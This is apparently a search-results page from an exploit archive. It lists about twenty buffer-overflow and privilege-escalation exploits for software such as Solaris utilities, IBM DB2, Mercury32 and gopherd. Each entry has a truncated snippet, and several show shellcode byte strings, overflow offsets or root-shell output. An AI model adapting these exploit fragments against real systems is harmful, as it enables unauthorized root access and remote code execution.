94 matches found
Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit
No description provided by source. include stdio.h include unistd.h / /usr/bin/write overflow proof of concept. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 [email protected] usage: write-exp shelloffset retaddroffset default offset should work. / long getesp asm"movl...
ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net
Author: SuperHeiAtph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Data: 2006-04-27 Simple analysis The vulnerability is another one of the preg_replace+/e vulnerabilities; the code is in \sources\actionadmin\search.php line 1 2 5 8-1 2 6 a 2: if $this-ipsclass-input'lastdate' $this-outp...
Serial Line Sniffer 0.4.4 Buffer Overflow
Original can be found at http://shellcoders.com/sintigan/slsnif-ploit.pl Author: [email protected] http://www.shellcoders.com/ ---------------------------------------- Program ID: Serial Line Sniffer 0.4.4 sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl sh-3.00 id uid=0root...
Half-Life Server 3.1.1.0 Remote Buffer Overflow Exploit
Exploit for linux platform in category remote exploits ======================================================= Half-Life Server 3.1.1.0 Remote Buffer Overflow Exploit ======================================================= / hoagiehlserver.c Remote exploit for Halflife-Servers. Binds a shell to...
GNU a2ps - Anything to PostScript Not SUID Local Overflow
/ Not added to Local Non Poc section /str0ke / include include include // by lizard / lizstyleatgmail.com // greets go to slider/trog for helpin me // not suid by default ; define VULNTHING "/usr/bin/a2ps" define DEFRET 0xbffffffa - strlensc - strlenVULNTHING define xnullbitch 1100 //im not a asm...
HTGET 0.9.x - Local Privilege Escalation
HTGET 0.9.x - Local Privilege Escalation !/usr/bin/perl ^^^^^^^^^^^^^^^^....,,,,|::::::: HTGET = 0.9.x local lame r00t exploit written by nekd0 of Unl0ck Research Team c .unl0ck research team 2004-2005. http://unl0ck.void.ru ................/^^^^''''|:::::::---- $shellcode =...
HTGET <= 0.9.x Local Root Exploit
No description provided by source. !/usr/bin/perl ^^^^^^^^^^^^^^^^....,,,,|::::::: HTGET = 0.9.x local lame r00t exploit written by nekd0 of Unl0ck Research Team c .unl0ck research team 2004-2005. http://unl0ck.void.ru ................/^^^^''''|:::::::---- $shellcode =...
Aspell (word-list-compress) Command Line Stack Overflow
No description provided by source. / Fuck private exploits . Fuck iranian hacking and security !! teams who are just some fucking kiddies. Fuck all "Security money makers" word-list-compress local exploit - SECU Coded by : c0d3r / root . razavi1366atyahoodotcom word-list-compress is not setuid . ...
Mercury32 Mail Server 4.01 - Pegasus IMAP Buffer Overflow (3)
Mercury32 Mail Server 4.01 - Pegasus IMAP Buffer Overflow 3 Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET,...
CCProxy Log - Remote Stack Overflow
include include include pragma commentlib, "ws232" unsigned char EndChar= "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A"; // HTTP/1.0 unsigned char shellcode = "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05" "xe8xedxffxffxff" / 254 bytes shellcode, xor with 0xee / / offset 92=IP offset 99=PORT/...
Icecast <= 2.0.1 Win32 Remote Code Execution Exploit (modded)
Exploit for unknown platform in category remote exploits ============================================================= Icecast include include ifdef WIN32 include include "winerr.h" define close closesocket else include include include include include include endif define VER "0.1" define PORT 80...
Microsoft Windows - JPEG Processing Buffer Overrun (MS04-028)
!/bin/sh The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw The crafted JPEG header makes Windows crash a couple of different ways 1 First, it crashes when the image is opened. 2 Second, it crashes when hovering the mouse over the image. The pointer overwrite is pretty...
Horde-Chora: Remote code execution
Background Chora is a PHP-based SVN/CVS repository viewer by the HORDE project. Description A vulnerability in the diff viewer of Chora allows an attacker to inject shellcode. An attacker can exploit PHP's file upload functionality to upload a malicious binary to a vulnerable server, chmod it as...
Xsok v1.02 "-xsokdir" local buffer overflow game exploit
Exploit for linux platform in category local exploits ======================================================== Xsok v1.02 "-xsokdir" local buffer overflow game exploit ======================================================== / 0x333xsok 2 = xsok 1.02 local game exploit Happy new year ! 2 : coded ...
shatterCommCtrl.txt
Intro ----- Brett Moore from Security Assessment put me onto this one. XP's Visual Styles, the feature that makes various controls in Windows XP look less dated, also introduce a new shatter type vulnerability into the OS. Vuln ------- Applications which have the new XPified appearance use...
Solaris Runtime Linker (SPARC) - ld.so.1 Local Buffer Overflow
Solaris Runtime Linker SPARC - ld.so.1 Local Buffer Overflow / ld.so.1 exploit SPARC coded by: osker178 bjr213 psu.edu Alright, so this exploits a fairly standard buffer overflow in the default Solaris runtime linker ld.so.1 discovery by Jouko Pynnonen Only real deviation here from the standard...
Shatter XP
Intro ----- Brett Moore from Security Assessment put me onto this one. XP's Visual Styles, the feature that makes various controls in Windows XP look less dated, also introduce a new shatter type vulnerability into the OS. Vuln ------- Applications which have the new XPified appearance use...
shatterSEH3.txt
============================================================================ = Shattering SEH III = = [email protected] = http://www.security-assessment.com = = Originally posted: September 29, 2003 ============================================================================ ==...
IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow
/ Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by Juan Manuel Pascual Escriba pask at uninet.edu / char sc= "\x31\xc0" / begin setuid 0 / "\x31\xdb" "\xb0\x17" "\xcd\x80" "\xeb\x1f" "\x5e" "\x89\x76\x08" "\x31\xc0" "\x88\x46\x07" "\x89\x46\x0c" "\xb0\x0b" "\x89\xf3"...
Gopherd 3.0.5 - FTP Gateway Remote Overflow
/ UMN gopherd2.x.x/3.x.x: remote "ftp gateway" buffer overflow. by: vade79/v9 v9 at fakehalo.deadpig.org fakehalo/realhalo three years since last audit, code is a little more secure. but, still found a few potentially exploitable situations. this exploits the "ftp gateway" feature of gopherd. the...